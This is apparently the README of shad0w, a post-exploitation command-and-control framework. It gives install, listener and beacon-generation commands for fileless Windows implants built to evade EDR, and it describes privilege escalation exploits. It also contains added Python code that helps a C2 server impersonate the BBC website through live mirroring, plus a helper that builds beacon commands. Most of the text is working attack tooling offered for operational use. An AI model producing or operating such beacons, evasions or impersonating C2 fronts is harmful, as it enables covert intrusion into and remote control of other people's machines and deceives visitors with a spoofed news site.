shad0w is a post exploitation framework designed to operate covertly in heavily monitored environments. Current features:
- Secure communication over HTTPS.
- Clone and live proxy any website, making the C2 fully browseable.
- Staged and static beacons
- Shellcode and powershell formats allow for completely fileless attacks
- Uses native windows syscalls
- Bypasses userland API hooking
- Blocks EDR from loading DLLs into its process
- Can execute .NET assemblies, EXEs, DLLs, VBS, JS or XSL files completely in memory
- Common privilege escalation exploits built in
- Interact with the file system
- Configurable C2 callback jitter
- Asynchronous command line
- Auto complete
- Up/Down history
- Reverse command search
- Syntax highlighting
Features still in development:
- Unmanaged PowerShell
- Syscalls for older versions of windows
- Kernel mode capability
- More privilege escalation exploits
- Ghost in the logs integration
- UAC bypasses
- Persistence
- 32 bit support
- More beacon formats
To install shad0w, run the two commands below, making sure you already have Docker installed on your system.
$ git clone https://github.com/bats3c/shad0w.git && cd shad0w
$ sudo ./shad0w install
To start the C2 server and have it listening for connections, use the following command.
$ shad0w listen -e <endpoint>
Where <endpoint> is the IP address or domain name the C2 will listen on. SSL certificates are generated dynamically.
To use the website mirroring functionality, use the -m or --mirror flag
$ shad0w listen -e www.bbc-news.com -m "https://www.bbc.com/"
This means that if the C2's address, www.bbc-news.com, is visited, the content of https://www.bbc.com/ is retrieved and returned. This is also true for any links on the cloned website: if the person browsing the C2 navigates to https://www.bbc-news.com/sport/football/52799575, the content at https://www.bbc.com/sport/football/52799575 is mirrored.
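The two things a live-proxy front like this has to get right are mapping what the visitor asked the C2 for onto the mirrored site, and rewriting the mirrored site's absolute links (and any redirect Location header) so that every click stays on the C2 instead of sending the visitor to the real site. The following is an added example of that logic, not shad0w's own code; the hostnames are the hypothetical ones from the walkthrough above, and the sample HTML is constructed.

```python
"""Live-proxy URL mapping and link rewriting for a C2 front.

Added example; not shad0w's own implementation. Hosts follow the README
walkthrough: the C2 answers as www.bbc-news.com and fetches from
https://www.bbc.com (both assumed).
"""
import re
from urllib.parse import urlsplit, urlunsplit

C2_HOST = "www.bbc-news.com"           # assumed C2 hostname
MIRROR_ORIGIN = "https://www.bbc.com"  # assumed site being mirrored


def upstream_url(request_target: str, mirror_origin: str = MIRROR_ORIGIN) -> str:
    """Map the visitor's request target on the C2 to the URL fetched upstream.

    Only the path and query of the client's request are kept. Any scheme or
    host the client supplied (absolute-form targets, or "//host/..." which
    would otherwise parse as a new host) is discarded, so a visitor can never
    turn the proxy into an open relay to a third-party site.
    """
    req = urlsplit(request_target)
    path = "/" + req.path.lstrip("/")
    origin = urlsplit(mirror_origin)
    return urlunsplit((origin.scheme, origin.netloc, path, req.query, ""))


def rewrite_links(text: str, mirror_origin: str = MIRROR_ORIGIN,
                  c2_host: str = C2_HOST) -> str:
    """Point absolute references to the mirrored site back at the C2.

    Used on HTML bodies and on upstream redirect Location headers alike;
    without it the first absolute link or 302 would take the visitor off the
    C2. Relative links need no change. Protocol-relative "//host/..."
    references are rewritten too.
    """
    host = re.escape(urlsplit(mirror_origin).netloc)
    # The lookahead ends the match at the hostname boundary, so look-alike
    # hosts such as www.bbc.com.evil.net or www.bbc.co.uk are left alone.
    pattern = re.compile(r"(?:https?:)?//" + host + r"(?=[/?#'\"\s]|$)")
    return pattern.sub("https://" + c2_host, text)


# Constructed sample of what the mirrored site might return.
SAMPLE_HTML = (
    '<a href="/sport/football/52799575">Football</a>\n'
    '<a href="https://www.bbc.com/news">News</a>\n'
    '<img src="//www.bbc.com/img/logo.png">\n'
    '<a href="https://www.bbc.co.uk/iplayer">iPlayer</a>\n'
)


if __name__ == "__main__":
    print(upstream_url("/sport/football/52799575"))
    print(upstream_url("//evil.example/x?y=1"))    # host dropped, path kept
    print(rewrite_links(SAMPLE_HTML))
    print(rewrite_links("https://www.bbc.com/news?id=1"))  # a Location header
```

Cookies are the remaining gotcha in a real proxy: a Set-Cookie with a Domain attribute for the mirrored site will be rejected by the browser when it arrives from the C2's hostname, so that attribute has to be dropped or rewritten as well.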
Only 64 bit beacons are currently supported
There are two types of beacons, secure and insecure. Secure beacons have all the mitigation and evasion techniques built in, such as syscalls and anti DLL injection. These secure beacons are designed to work on the latest versions of Windows.
The insecure beacons are designed to work on a wide variety of Windows versions, but are intended for situations where detection does not matter.
The syntax for beacon generation:
$ shad0w beacon -p <payload> -H <c2 address> -f <format> -o <filename>
The format for payloads follows this syntax:
<arch>/<os>/<secure>/<static>
So to generate a static 64 bit secure Windows beacon it would be
x64/windows/secure/static
Staged beacons are recommended, so the command to generate a staged secure beacon in EXE format would be
$ shad0w beacon -p x64/windows/secure -H www.bbc-news.com -f exe -o beacon.exe
Or for an insecure beacon it would be
$ shad0w beacon -p x64/windows -H www.bbc-news.com -f exe -o beacon.exe
There are currently 3 different beacon formats: exe, shellcode and powershell.
The -f flag is used to control the format of the beacon. To generate a beacon in shellcode or powershell format, use the raw or psh value respectively
$ shad0w beacon -p x64/windows/secure -H www.bbc-news.com -f raw -o beacon.bin
$ shad0w beacon -p x64/windows/secure/static -H www.bbc-news.com -f psh -o beacon.ps1
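A small pre-flight check for the payload string and format before invoking the generator, as an added example (not part of shad0w): it parses the <arch>/<os>/<secure>/<static> syntax, enforces the constraints this page states (only x64 Windows beacons exist, modifiers in the documented order, formats exe/raw/psh) and builds the command line shown above. The output-file extensions are a convention assumed here from the examples, not a rule of the tool.

```python
"""Validate shad0w beacon options and build the generator command line.

Added example, not shad0w's own code. It encodes only what the README says:
payloads are <arch>/<os>[/secure][/static], only 64 bit Windows beacons are
supported today, and formats are exe, raw (shellcode) and psh (powershell).
"""
from dataclasses import dataclass
from typing import List, Optional

# Extension per format: an assumed convention matching the README examples.
FORMATS = {"exe": ".exe", "raw": ".bin", "psh": ".ps1"}
MODIFIERS = ["secure", "static"]  # documented order


@dataclass(frozen=True)
class BeaconSpec:
    arch: str
    os: str
    secure: bool   # evasions built in (syscalls, anti DLL injection)
    static: bool   # False means a staged beacon, the recommended default

    @property
    def payload(self) -> str:
        parts = [self.arch, self.os]
        if self.secure:
            parts.append("secure")
        if self.static:
            parts.append("static")
        return "/".join(parts)


def parse_payload(payload: str) -> BeaconSpec:
    """Parse <arch>/<os>[/secure][/static]; raise ValueError on anything else."""
    parts = payload.strip().lower().split("/")
    if not 2 <= len(parts) <= 4:
        raise ValueError(f"payload must be <arch>/<os>[/secure][/static], got {payload!r}")
    arch, os_, *flags = parts
    if arch != "x64":
        # 32 bit support is still in development per the README.
        raise ValueError("only 64 bit beacons are currently supported")
    if os_ != "windows":
        raise ValueError(f"unsupported os {os_!r}; only windows beacons exist")
    # Modifiers must be known, unique and in the documented order.
    if flags != [m for m in MODIFIERS if m in flags]:
        raise ValueError(f"modifiers must be 'secure' then 'static', got {flags}")
    return BeaconSpec(arch, os_, "secure" in flags, "static" in flags)


def is_valid_payload(payload: str) -> bool:
    try:
        parse_payload(payload)
        return True
    except ValueError:
        return False


def build_beacon_command(payload: str, c2_host: str, fmt: str,
                         outfile: Optional[str] = None) -> List[str]:
    """Return the argv for `shad0w beacon` after validating every option."""
    spec = parse_payload(payload)
    if fmt not in FORMATS:
        raise ValueError(f"format must be one of {sorted(FORMATS)}, got {fmt!r}")
    if not c2_host or "/" in c2_host:
        raise ValueError("-H takes a bare hostname or IP, not a URL")
    if outfile is None:
        outfile = "beacon" + FORMATS[fmt]   # assumed naming convention
    return ["shad0w", "beacon", "-p", spec.payload, "-H", c2_host,
            "-f", fmt, "-o", outfile]


if __name__ == "__main__":
    print(" ".join(build_beacon_command("x64/windows/secure", "www.bbc-news.com", "raw", "beacon.bin")))
    print(" ".join(build_beacon_command("x64/windows/secure/static", "www.bbc-news.com", "psh")))
    print(is_valid_payload("x86/windows/secure"))   # False: no 32 bit beacons yet
```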
To get a list of commands, use the help command
shad0w ≫ help
To get a list of active beacons, use the beacons command
shad0w ≫ beacons
To interact with a beacon, use the beacons command with the -i flag specifying the beacon id
shad0w ≫ beacons -i 1